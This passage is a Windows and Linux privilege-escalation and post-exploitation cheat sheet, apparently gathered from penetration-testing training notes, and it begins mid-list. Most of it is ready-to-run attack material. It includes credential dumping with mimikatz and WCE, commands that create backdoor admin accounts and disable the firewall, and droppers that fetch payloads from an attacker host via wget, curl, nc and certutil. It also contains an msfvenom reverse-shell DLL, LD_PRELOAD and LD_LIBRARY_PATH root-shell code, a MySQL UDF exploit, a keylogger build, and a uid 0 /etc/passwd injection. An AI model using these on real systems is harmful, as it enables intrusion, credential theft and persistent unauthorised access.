wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
sc stop $SERVICENAME & sc start $SERVICENAME
Method #3: Tokens
Take advantage of:
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege
Reference: https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/
Method #4: Hard coded credentials
Commands:
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Method #5: Sensitive files on Desktop, Documents (xls, txt, ...)
Take a look at Intro to Post Exploitation as well to find commands to search for sensitive files and information.
Method #6: DLL injection / hijacking
Trusted directories:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\CWDIllegalInDllSearch
Method #7: Unattended installation files (Unattend.xml)
Unattended installs that were not cleaned up properly can be abused. Mainly in these directories:
dir C:\Windows\Panther\
dir C:\Windows\Panther\Unattend\
dir C:\Windows\System32\
dir C:\Windows\System32\sysprep\
In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf.
Using metasploit:
msf> use post/windows/gather/enum_unattend
Method #8: GPP cracking
These Group Policy configuration files that could contain passwords (Groups.xml) are "encrypted" using a known AES key, and are found in a shared folder on the domain controller with read access for all domain-authenticated users.
net use z: \\$IP\SYSVOL
SYSVOL is simply a folder which resides on each and every domain controller within the domain.
It contains the domain's public files that need to be accessed by clients and kept synchronised between domain controllers. The default location for SYSVOL is C:\Windows\SYSVOL, although it can be moved to another location during the promotion of a domain controller. It's possible but not recommended to relocate SYSVOL after DC promotion as there is potential for error. The SYSVOL folder can be accessed through its share \\domainname.com\sysvol or the local share name on the server \\servername\sysvol. SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. By default there are two folders with a GUID name under "C:\Windows\SYSVOL\domain\policies", representing two group policies (GPOs). In any new domain environment we always get two default GPOs, Default Domain Policy and Domain Controllers Policy.
To update your GPOs:
gpupdate
To view your currently assigned GPOs:
gpresult /R
dir /s Groups.xml
Another, more direct attack vector:
findstr /S /I cpassword \\$FQDN\sysvol\$FQDN\policies\*.xml
Once we get the cpassword value:
In Linux:
gpp-decrypt $AES_PASSWORD
In Windows, use the PowerSploit function Get-GPPPassword:
Get-DecryptedCpassword $AES_PASSWORD
https://social.technet.microsoft.com/wiki/contents/articles/24160.active-directory-back-to-basics-sysvol.aspx
https://adsecurity.org/?p=2288
Method #9: Weak services and bad permissions
Use AccessChk from Sysinternals.
Which services can be modified by any authenticated user (regardless of privilege level):
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
List service parameters:
accesschk.exe -ucqv $SERVICENAME
Find all weak folder permissions per drive:
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
Find all weak file permissions per drive:
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
Permissions on a specific folder:
accesschk.exe Builtin\Users c:\inetpub
Look at vulnerable service configuration parameters:
sc qc $SERVICE
Locate an interesting parameter; this is only an example:
sc config $SERVICE binpath= "net user alien alien /add"
sc stop $SERVICE
sc start $SERVICE
From metasploit (post module):
msf> use exploit/windows/local/service_permissions
Method #10: AlwaysInstallElevated ON
Allows any MSI package to be run as SYSTEM.
Manual method:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Using Metasploit:
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi
msiexec /quiet /qn /i C:\Users\$USER\Downloads\rotten.msi
Another method with metasploit: if the machine has the AlwaysInstallElevated registry flag on, then just:
msf> use exploit/windows/local/always_install_elevated
Method #11: Abusing scheduled tasks
schtasks /query /fo LIST /v
tasklist /SVC
Method #12: Local exploits
msf> use exploit/windows/local/*
Alternative methods of becoming SYSTEM:
https://blog.xpnsec.com/becoming-system/

Linux Privilege Escalation Methods
Most common techniques for privilege escalation in Linux environments:
Method #1: Find setuids
Sometimes in CTFs there are trojans hidden in the system with the setuid bit set. Look for any of those using the find command:
find / -perm -4000 -ls 2> /dev/null
Method #2: Find world writable directories
find / -perm -777 -type d -ls 2> /dev/null
Method #3: Find world readable logs or backups
Many times Linux is very restrictive with the default permissions, BUT sometimes sysadmins do not properly protect system backups, so you can easily extract sensitive system files such as /etc/passwd. Looking for gz, tar or zip files is definitely worth it.
find / \( -name "*.gz" -o -name "*.tar" -o -name "*.zip" \) 2> /dev/null
Method #4: Check crontab tasks
Added scheduled tasks may contain misconfigurations, for example a script that is run by root and is writable by everybody.
crontab -l
ls -lR /etc/cron*
Method #5: Local exploits for kernel or applications
As part of your local enumeration and information gathering, look for kernel versions, installed applications and running daemons in order to detect any old version with known exploits.
Find setuid binaries:
find / -perm -4000 -ls 2> /dev/null
Find world writable files:
find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null
Find world writable directories:
find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null
Look for interesting files:
find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null
Check sudo:
sudo su
sudo -l
Decrypt PKCS#12 objects:
openssl pkcs12 -info -in $FILE
Show certs in a PKCS#7 file:
openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der
Show keystore content:
keytool -list -v -keystore keystore.jks
Commands for information gathering:
ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu
Find users with shell access:
egrep -e '/bin/(ba)?sh' /etc/passwd
Check bootup services:
ls /etc/rc*
SSH relationships and logins:
cat ~/.ssh/*
https://payatu.com/guide-linux-privilege-escalation/
Tools:
http://pentestmonkey.net/tools/audit/unix-privesc-check
https://github.com/sleventyeleven/Linuxprivchecker
https://github.com/rebootuser/LinEnum

Windows Post-exploitation
Check filesystem:
Like "ls -la" in Linux:
dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt
Compute MD5 hash:
Get-FileHash -Algorithm MD5 -Path .\$FILE
Check registry:
reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt
Check scheduler:
schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt
Other checks:
DRIVERQUERY
wmic os where Primary='TRUE' reboot
List hotfixes:
wmic qfe
notepad myfile.txt:lion.txt
eventvwr.exe
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts
Wmic commands:
wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get
List SIDs of the system (as admin):
wmic useraccount get name,sid,fullname
Net commands:
net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr
Backdoor account:
net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add
Check routing/network information:
route print
arp -A
ipconfig /all
getmac
Show file attributes / permissions:
cacls cmd.exe
attrib cmd.exe
List services:
sc queryex type=service state=all
net start
Other info:
systeminfo
whoami
Idem for Win XP:
echo %USERNAME%
Firewall:
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Disable firewall:
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
RDP
Show RDP sessions:
quser
qwinsta
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"
svchost.exe -k termsvcs
tasklist /svc /S servername /U username /P password
Change RDP daemon status from Meterpreter (more Meterpreter commands in the Metasploit Meterpreter Cheat Sheet):
msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1
Change RDP port:
HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
Value: PortNumber REG_DWORD=3389
Remote Execution commands:
wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP
From Sysinternals psexec:
psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1
Copy a file to the target host AND execute it:
psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp
Authenticated WMI Exec via Powershell:
msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Universal

msf exploit(windows/local/ps_wmi_exec) >
On the same host but with another role:
runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"
Windows exploit suggester (OBSOLETE)
WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Tools for information gathering
Manual method:
dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts
LaZagne
Download LaZagne from https://github.com/AlessandroZ/LaZagne
laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox
RATs (Remote Administration Tools)
Pupy https://github.com/n1nj4sec/pupy: open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in Python.
Sniffers
Sniffers for Windows
Install Wireshark; also use dumpcap in the console:
dumpcap -D
dumpcap -i $IFACE
Keyloggers for Windows
Windows keylogger (no admin rights): https://raw.githubusercontent.com/GiacomoLaw/Keylogger/master/windows/klog_main.cpp
To cross-compile it for Windows:
i686-w64-mingw32-g++ klog_main.cpp -o klog -static
Network sniffers for Linux
tcpdump -X -s 0 -i $INTERFACE
Password dumping
mimikatz
mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv
Fgdump
Dumps hashes (needs SYSTEM privileges):
fgdump.exe
WCE (Windows Credential Editor)
Dumps clear passwords:
wce -w
Dumps hashes:
wce
Persistent, writes to credentials.txt:
wce -r
Change your credentials in memory:
wce -s
Droppers
Droppers are programs that allow you to download tools, trojans, etc. to the target machine to continue the compromise locally.
Droppers using Linux:
wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE root@$IP:~
Droppers using Windows:
Powershell:
curl -Uri $URL
See also Powercat in the Powershell frameworks section.
ROBOCOPY:
NET USE \\$IP\IPC$ /USER:DOMAIN\USER
ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
NET USE \\$IP\IPC$ /D
BITSAdmin:
https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool
Direct transfer:
bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE
Using a download queue:
bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE
Certutil:
certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe
Notepad:
notepad.exe http://$IP/file.txt
Living Off the Land (LOLbins) for Windows
Links:
https://github.com/LOLBAS-Project/LOLBAS
https://lolbas-project.github.io/
https://gtfobins.github.io/
https://github.com/Arno0x/CSharpScripts
https://gist.github.com/jstangroome/9adaa87a845e5be906c8
https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1
Examples:
hh.exe C:\windows\system32\calc.exe
C# compiler built-in command:
csc.exe
Droppers using known protocols
HTTP
Python2:
python -m SimpleHTTPServer
python -m SimpleHTTPServer 80
Python3:
python3 -m http.server 8080
Php:
php -S localhost:8000
Ruby:
ruby -run -e httpd . -p 8000
FTP:
pip install pyftpdlib
python -m pyftpdlib
SMB:
impacket-smbserver PAYLOADS /root/payload
SharpUp.exe is part of the GhostPack suite of tools and is a C# port of PowerUp that will perform numerous privilege escalation checks. The following command will run all priv esc checks and store the output in a file.
Command Reference:
Output File: output.txt
Command:
SharpUp.exe > output.txt
https://github.com/GhostPack/SharpUp
https://www.harmj0y.net/blog/redteaming/ghostpack/
winpeas.exe is a script that will search for all possible paths to escalate privileges on Windows hosts. The command below will run all priv esc checks and store the output in a file.
Command Reference:
Run all checks: cmd
Output File: output.txt
Command:
winpeas.exe cmd > output.txt
Windows privesccheck
winenum
winpeas
Enumerating all the access tokens on the victim system with PowerSploit:
Invoke-TokenManipulation -ShowAll | ft -Wrap -Property domain,username,tokentype,logontype,processid
Running the compiled code invokes a new process with the newly stolen token.
One of the techniques of token manipulation is creating a new process with a token "stolen" from another process. This is when an access token already present in one of the running processes on the victim host is retrieved, duplicated and then used to create a new process, making the new process assume the privileges of that stolen token. A high-level outline of the token stealing that will be carried out in this lab is as follows:
Step: Win32 API
Open a process with the access token you want to steal: OpenProcess
Get a handle to the access token of that process: OpenProcessToken
Make a duplicate of the access token present in that process: DuplicateTokenEx
Create a new process with the newly acquired access token: CreateProcessWithTokenW
DLL Hijacking
DLL Search Order Hijacking for privilege escalation, code execution, etc.
Generating a DLL that will be loaded and executed by a vulnerable program, which connects back to the attacking system with a meterpreter shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil-meterpreter64.dll
Pass The Hash: Privilege Escalation with Invoke-WMIExec
If you have an NTLMv2 hash of a local administrator on a box ws01, it's possible to pass that hash and execute code with the privileges of that local administrator account:
Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username administrator -command hostname
If the target system you are passing the hash to has the following registry value set to 0x1, pass the hash will work even for accounts that are not RID 500:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username spotless -command hostname
#enumerate the users
#rid brute forcing
cme smb $ip -u "" -p "" --rid-brute
#active sessions
cme smb $ip -u '' -p '' --loggedon-users
#users in general
cme smb $ip -u '' -p '' --users
#enumerate the groups
#local groups
cme smb $ip -u '' -p '' --local-groups
#domain groups
cme smb $ip -u '' -p '' --groups
#smbclient
smbclient -L $ip
smbclient //$ip/tmp
smbclient \\\\192.168.1.105\\ipc$ -U john
smbclient //$ip/ipc$ -U john
#mounting the share
mkdir /mnt/targetshare
mount -t cifs //172.16.20.88/ipc$ -o username=[username] /mnt/targetshare
nmap
nmap -sU -p 69 --script tftp-enum.nse $ip
Interact with the TFTP protocol:
#setup the connection
tftp 172.16.200.100
#get a file
tftp> get /etc/passwd
#upload reverse shell
tftp> put shell.php
Enumerate information with a known community string:
# enumerate windows users
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
# enumerate running processes
snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1
Linux Privilege Escalation

OS & User Enumeration :

############################### User Enumeration ##########################
whoami
id
sudo -l
cat /etc/passwd
ls -la /etc/shadow

################################# OS Enumeration ##########################
cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
arch
ldd --version

################################# Installed tools #########################
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp

############################ File owners and permissions ##################
ls -la
find . -ls
history
cat ~/.bash_history
find / -type f -readable 2>/dev/null      # files readable by the current user
find / -writable -type d 2>/dev/null      # directories writable by the current user
find /usr/local/ -type d -writable

################################## File mount #############################
/mnt /media        -> usb devices and other mounted disks
mount              -> show all the mounted drives
df -h              -> list all partitions
cat /etc/fstab     # list all drives mounted at boot time
/bin/lsblk

#################################### Applications #########################
dpkg -l            # for Debian based systems

##################################### Cron tabs ###########################
ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron*                  # locating cron logs
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log          # locating running jobs from logs
grep CRON /var/log/syslog              # grepping cron from syslog

#################################### Internal Ports #######################
netstat -alnp | grep LIST | grep port_num
netstat -antp
netstat -tulnp
curl the listening ports (a service bound only to 127.0.0.1 is often left unauthenticated)

################################### Interesting DIRS ######################
/dev/scripts /opt /mnt /var/www/html /var /etc /media /backup

################################### SUID Binaries #########################
(https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binar
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"

################################# Firewall Enumeration ####################
grep -Hs iptables /etc/*

############################### Kernel Modules ############################
lsmod
/sbin/modinfo

PrivEsc Checklist :
- sudo rights (https://medium.com/schkn/linux-privilege-escalation-using-text-editors-and-files-part-1-a8373396708d)
- sensitive files & permission misconfiguration (SSH keys, shadow files)
- SUID Binaries
- Internal Ports
- Processes running with root privilege
- Cron tabs
- Hidden cron process with pspy
- Mounted filesystems
- TMUX session hijacking
- Path Hijacking
- Process Injection (https://github.com/nongiach/sudo_inject)
- Docker PS
- Interesting groups (https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe): wheel, shadow, disk, video, root, docker
- lxd (https://www.hackingarticles.in/lxd-privilege-escalation/)
- Environment variables
- bash version < 4.2-048 | 4.4 (https://tryhackme.com/room/linuxprivesc Task 14, 15)
- NFS Misconfiguration
- linpeas.sh -a        # all checks

SUID Shared Object Injection :
1. Find a SUID binary that looks fishy
2. strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
3. Match a shared object the binary fails to find ("No such file") against a path where you have write access
   (the loader ignores LD_PRELOAD/LD_LIBRARY_PATH for setuid binaries, so the binary itself must look in a directory you can write to)
4. Create a shared object with the missing SO file name in that location
5. Run the SUID binary

NFS Misconfiguration :
https://tryhackme.com/room/linuxprivesc (Task 19)
cat /etc/exports        # on the target; look for shares exported with no_root_squash
On Kali (as root, so the file keeps uid 0 on the share):
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
On Target:
/tmp/shell.elf

Kernel Exploits :
cat /proc/version
uname -r
uname -mrs
cat /etc/lsb-release
cat /etc/os-release
gcc exploit.c -o exp
Compile the exploit on the local machine and upload it to the remote machine (match the target's architecture and libc):
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
apt-get install gcc-multilib        # needed for -m32 builds

Recover Deleted Files :
extundelete (HTB Mirai - https://tiagotavares.io/2017/11/mirai-hack-the-box-retired/)
strings

C Program to SetUID /bin/bash :
/* suid.c */
#include <unistd.h>

int main(void)
{
    /* runs with euid 0 because of the setuid bit; setuid(0) then sets the
       real uid as well, so bash will not drop privileges */
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

gcc -Wall suid.c -o exploit
sudo chown root exploit
sudo chmod u+s exploit
$ ls -l exploit
-rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit
./exploit
# whoami
root

Tools :
Linux Exploit Suggester (HTB Nibbles) (https://github.com/mzet-/linux-exploit-suggester)
SUIDENUM (https://github.com/Anon-Exploiter/SUID3NUM)
LinEnum.sh (https://github.com/rebootuser/LinEnum)
linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
Linprivchecker (https://github.com/sleventyeleven/linuxprivchecker)
pspy (https://github.com/DominicBreuker/pspy) (crontabs)

Resources :
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
https://github.com/Ignitetechnologies/Privilege-Escalation
https://gtfobins.github.io/
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Mysql

MYSQL UDF Exploit : https://www.exploit-db.com/exploits/1518
(needs mysqld running as root and a plugin directory it can load from; check it with: show variables like 'plugin_dir';)
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
exit
user@target$ /tmp/rootbash -p

MYSQL running as root :
mysql -u root
select sys_exec('whoami');
select sys_eval('whoami');
/* If the function doesn't exist, create it */
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
/* if NULL is returned, try redirecting stderr into the output */
select sys_eval('ls /root 2>&1');

Sudo Abuse
$ sudo -l
[sudo] password for appadmin:
User appadmin may run the following commands on this host:
    (root) /opt/Support/start.sh
Checklist:
- write permission to start.sh
- write permission to /opt/Support (the script can then be replaced)
- create start.sh if it doesn't exist

Environment Variables (https://tryhackme.com/room/linuxprivesc)
Check which environment variables are inherited (look for the env_keep options):
sudo -l

LD_PRELOAD
LD_PRELOAD is an optional environment variable containing one or more paths to shared libraries (shared objects) that the loader will load before any other shared library, including the C runtime library.

/* preload.c */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init(void)
{
    unsetenv("LD_PRELOAD");     /* do not preload ourselves into the shell we spawn */
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
Run one of the programs you are allowed to run via sudo (listed by sudo -l) while setting the LD_PRELOAD environment variable to the full path of the new shared object:
sudo LD_PRELOAD=/tmp/preload.so program-name-here

LD_LIBRARY_PATH
LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.
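Both LD_PRELOAD and LD_LIBRARY_PATH only help when sudo actually passes the variable through (an env_keep entry in sudo -l), and the Sudo Abuse checklist above is three filesystem checks on the allowed command. The script below is an added example, not code from the original notes or the TryHackMe room they cite: it reads saved sudo -l output, reports which loader variables env_keep preserves, and classifies each sudo-able command by whether its file or its directory is writable from the current uid. The sudoers lines, the /opt/Support-style paths and the /tmp/evil.so name it mentions are constructed for illustration.

```shell
#!/usr/bin/env bash
# sudo_triage.sh: added example (not from the original notes or the TryHackMe room
# they cite). It reads saved `sudo -l` output and answers the two questions the
# Sudo Abuse checklist and the env_keep note above raise:
#   1. does sudo keep LD_PRELOAD or LD_LIBRARY_PATH from our environment?
#   2. is any command we may run as root a file, or in a directory, we can write to?
# Usage: ./sudo_triage.sh <(sudo -l)
# All sudoers lines, paths and the /tmp/evil.so name below are constructed.

# Loader variables listed in an env_keep clause (either "env_keep+=LD_PRELOAD" or
# env_keep+="LD_PRELOAD LD_LIBRARY_PATH" style), one per line.
sudo_env_keep() {                        # $1 = file with `sudo -l` output
    grep -E 'env_keep' "$1" | grep -oE 'LD_(PRELOAD|LIBRARY_PATH)' | sort -u
}

# Absolute command paths from "(runas) [TAG:] /path [args], /path" lines, one per line.
# Entries such as "ALL" are dropped; arguments after the path are ignored.
sudo_commands() {                        # $1 = file with `sudo -l` output
    sed -nE 's/^[[:space:]]*\([^)]*\)[[:space:]]*//p' "$1" \
      | sed -E 's/(NOPASSWD|PASSWD|SETENV|NOSETENV|EXEC|NOEXEC):[[:space:]]*//g' \
      | tr ',' '\n' \
      | awk '$1 ~ /^\// { print $1 }'
}

# Classify each sudo command by what the current uid can do to it:
#   WRITABLE_FILE      edit the script/binary in place
#   MISSING_CREATABLE  the file is absent but we can create it ("Create start.sh if doesn't exist")
#   WRITABLE_DIR       the file exists but its directory is ours, so it can be replaced
sudo_writable_targets() {                # $1 = file with `sudo -l` output
    sudo_commands "$1" | while IFS= read -r cmd; do
        dir=$(dirname "$cmd")
        if [ -e "$cmd" ] && [ -w "$cmd" ]; then
            printf 'WRITABLE_FILE %s\n' "$cmd"
        elif [ ! -e "$cmd" ] && [ -d "$dir" ] && [ -w "$dir" ]; then
            printf 'MISSING_CREATABLE %s\n' "$cmd"
        elif [ -d "$dir" ] && [ -w "$dir" ]; then
            printf 'WRITABLE_DIR %s\n' "$cmd"
        fi
    done
}

# Summary of both checks; returns 0 when something looks exploitable, 1 otherwise.
sudo_triage() {                          # $1 = file with `sudo -l` output
    local keep targets v rc=1
    keep=$(sudo_env_keep "$1")
    targets=$(sudo_writable_targets "$1")
    for v in $keep; do
        # only useful together with a sudo-able command: sudo LD_PRELOAD=... <cmd>
        printf 'sudo keeps %s: try sudo %s=/tmp/evil.so <allowed-command>\n' "$v" "$v"
        rc=0
    done
    if [ -n "$targets" ]; then
        printf '%s\n' "$targets"
        rc=0
    fi
    return $rc
}

if [ $# -gt 0 ]; then
    sudo_triage "$1"
fi
```

A WRITABLE_DIR hit matters even when the script itself is root-owned and read-only: the directory owner can rename the original away and drop a replacement with the same name, which is the second item of the checklist above.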
Run ldd against any program that you can execute via sudo (sudo -l) to see which shared libraries it uses:
ldd /usr/sbin/apache2
Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c:

/* library_path.c */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void hijack(void) __attribute__((constructor));

void hijack(void)
{
    unsetenv("LD_LIBRARY_PATH");    /* the spawned shell must not pick up our fake library */
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}

gcc -o /tmp/libcrypt.so.1 -shared -fPIC library_path.c
Run the program using sudo while setting the LD_LIBRARY_PATH environment variable to /tmp (where the compiled shared object was written):
sudo LD_LIBRARY_PATH=/tmp program-name-here

Escalation Methods
echo root:gl0b0 | /usr/sbin/chpasswd                                          # from a root context: reset root's password
echo "exploit:YZE7YPhZJyUks:0:0:root:/root:/bin/bash" >> /etc/passwd; su exploit   # writable /etc/passwd: adds uid 0 user exploit, password exploit
nano /etc/passwd   -> change the user's UID (and GID) to 0
nano /etc/sudoers  -> user ALL=(ALL) NOPASSWD:ALL
cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash; /tmp/rootbash -p         # from a root context; -p keeps the effective uid

Windows Privilege Escalation

Enumeration

OS Info Enumeration
systeminfo
hostname
echo %username%
wmic qfe            -> check patches
wmic logicaldisk    -> get other disk information

User Enumeration
whoami
whoami /priv                  -> check user privileges
whoami /groups                -> check user groups
net user                      -> list all users
net user <username>           -> check groups associated with a user
net localgroup                -> check all the local groups available
net localgroup <groupname>    -> list the members of the given local group

Task | Service | Process Enumeration
sc queryex type= service      (lists all services)
tasklist /SVC
tasklist
net start
DRIVERQUERY
wmic product get name,version,vendor

Permission Enumeration
C:\Program Files : icacls program_name
icacls root.txt /grant <user>:F      (to grant permission to access a file)
Check the PowerShell history file:
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Check stored usernames and passwords:
cmdkey /list

Network based
ipconfig
ipconfig /all
arp -a
route print
netstat -ano

Password Hunting
findstr /si password *.txt *.ini *.config     (try searching in differe
dir /s *pass* == *cred* == *vnc* == *.config*
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc*
where /R C:\ user.txt
where /R C:\ *.ini
Swisskyrepo for manual pwd enumeration

AV / Firewall check / Service Enumeration
sc query windefend
netsh advfirewall firewall dump
netsh advfirewall show currentprofile
